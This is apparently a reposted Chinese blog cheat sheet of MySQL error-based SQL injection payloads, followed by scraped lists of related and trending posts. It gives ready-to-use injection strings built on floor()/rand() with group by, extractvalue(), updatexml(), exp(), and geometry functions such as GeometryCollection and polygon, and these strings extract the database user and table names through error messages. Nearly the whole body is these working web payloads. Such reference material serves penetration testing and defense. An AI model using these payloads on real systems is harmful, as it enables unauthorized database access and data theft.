SQL--报错回显注入
1、floor()函数
原理:
利用rand()函数与group()函数的相互冲突,floor()是向下取整函数,floor(9.99)=9.0
语法结构:
username=admin' and (select 1 from (select count(*), concat(floor(rand(0)*2),0x23,你想获取的数据的sql语句)x from information_schema.tables group by x )a) and '1' = '1
2、extractvalue()函数
语法结构:
extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)))
concat中添加要查询的语句
3、updatexml()函数
语法结构:
and 1=(updatexml(1,concat(0x3a,(select user())),1))
4、exp()函数
语法结构:
and EXP(~(SELECT * from(select user())a))
5、归类
GeometryCollection()
id = 1 AND GeometryCollection((select * from (select * from(select user())a)b))
polygon()
id =1 AND polygon((select * from(select * from(select user())a)b))
multipoint()
id = 1 AND multipoint((select * from(select * from(select user())a)b))
multilinestring()
id = 1 AND multilinestring((select * from(select * from(select user())a)b))
linestring()
id = 1 AND LINESTRING((select * from(select * from(select user())a)b))
转载于:https://www.cnblogs.com/ldsec/p/5792464.html
SQL--报错回显注入相关推荐
- 【漏洞发现-sql注入】有回显注入--sqli-labs
一.漏洞描述 数据库是对用户数据进行存储以及删除等操作 ,功能是用来组织,存储和管理数据.比如我们网站每一个用户对应的用户名基本信息,账号密码等等,都在服务器用数据库保存.用户通过对网站的操作,请求返 ...
- 利用sql报错帮助进行sql注入
我们可以利用sql报错帮助进行sql注入,这里以sql server 为例: sql查询时,若用group by子句时,该子句中的字段必须跟select 条件中的字段(非聚合函数)完全匹配,如果是se ...
- sql注入-回显注入实例详解
根据前面对sql注入流程的说明https://blog.csdn.net/CPriLuke/article/details/106961748 本章主要对说明的内容通过实战的方式进一步加深,实战环境 ...
- 84.网络安全渗透测试—[SQL注入篇23]—[高级注入技巧-dnslog无回显注入]
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一.高级注入技巧 dnslog无回显注入 1.原理 2.dnslog平台 3.MySQL dnslog无回显注入 ...
- Xshell安装sql报错:The GPG keys listed for the “MySQL 8.0 Community Server“ repository are already instal
文章目录 Xshell安装sql报错:The GPG keys listed for the "MySQL 8.0 Community Server" repository are ...
- Xshell安装sql报错:······ RSA sha1 ((MD5) PGP) md5 NOT OK (MISSING KEYS: (MD5) PGP#3a79bd29)
文章目录 Xshell安装sql报错:······ RSA sha1 ((MD5) PGP) md5 NOT OK (MISSING KEYS: (MD5) PGP#3a79bd29) 报错截图: 分 ...
- 数据库执行sql报错Got a packet bigger than 'max_allowed_packet' bytes及重启mysql
准备在mysql上使用数据库A,但mysql5经过重装后,上面的数据库已丢失,只得通过之前备份的A.sql重新生成数据库A. 1.执行sql报错 在执行A.sql的过程中,出现如下错误:Got a p ...
- DB2 sql报错后查证原因与解决问题的方法
DB2 sql报错后查证原因与解决问题的方法 参考文章: (1)DB2 sql报错后查证原因与解决问题的方法 (2)https://www.cnblogs.com/BradMiller/p/31978 ...
- 一篇文章让你解决sql报错check the manual that corresponds to your MySQL server version for the right syntax to
一篇文章让你解决sql报错 反馈 因为这一个问题,找到了很多类似问题,你在看到这篇博客时,可能不是这个,但是一定是下面其中一个: Mysql错误:check the manual that corre ...
- mybatis-plus自定义sql报错 ew.customSqlSegment
mybatis-plus自定义sql报错: org.mybatis.spring.MyBatisSystemException: nested exception is org.apache.ibat ...
最新文章
- 手机端适应_不轻易透露的超强技巧!详解iVX中怎样做设备自适应
- 07.十分钟学会tomcat数据源
- php终止脚本执行(exit、die、return)
- 11届蓝桥杯青少年组C++全国赛高级组 六.编程实现:求阶乘(python3实现)
- 打遍天下无敌手,却说它只是个baseline!多目标跟踪FairMOT的烦恼
- java面向对象数组_Java面向对象的构造器与数组对象
- Java性能调优小技巧
- python模块的使用方法_python中requests模块的使用方法
- Cannot set property ‘innerHTML‘ of null 问题的解决
- R语言建立VAR模型分析联合内生变量的动态关系
- 【软件使用】Macbook M1 QuickTime录屏讲解(只录电脑或者同时录电脑和麦克风人声)
- NodeJS 服务 Docker 镜像极致优化指北
- 求营业额占比 【问题描述】 从键盘输入学校附近某烧烤店某年每月的营业额,然后计算每月的营业额在年营业额中所占的百分比(四舍五入为整数,且不会超过全年的70%),并以样例输出所示的水平直方图形式
- python声音识别歌曲_听歌识曲--用python实现一个音乐检索器的功能
- Android调用系统相机拍照
- 华为发布海思麒麟950:神兽决斗跑分琅琊榜,麒麟压得过骁龙?---ESM
- python返回上一个交易日
- Unity中行星和恒星的旋转——Rotate和RotateAround
- dd命令安装Linux安装教程详细步骤
- 防垃圾邮件网关/防钓鱼邮件解决方案
热门文章
- CSS-----盒子模型
- [LeetCode] NO. 349 Intersection of Two Arrays
- 枚举报错 Syntax error on token enum, interface expected
- log4j-over-slf4j与slf4j-log4j12共存stack overflow异常
- 硬盘(U盘)被误格式化(删除),重要的文件如何恢复?
- 刷屏!马化腾:腾讯只是一家普通公司,随时可以被替换
- 程序员需知的 58 个网站!个个经典
- 你碰到过的最难调的 Bug 是什么?
- 大数据架构师必读的NoSQL建模技术
- 教你一招最屌的阅读开源项目的姿势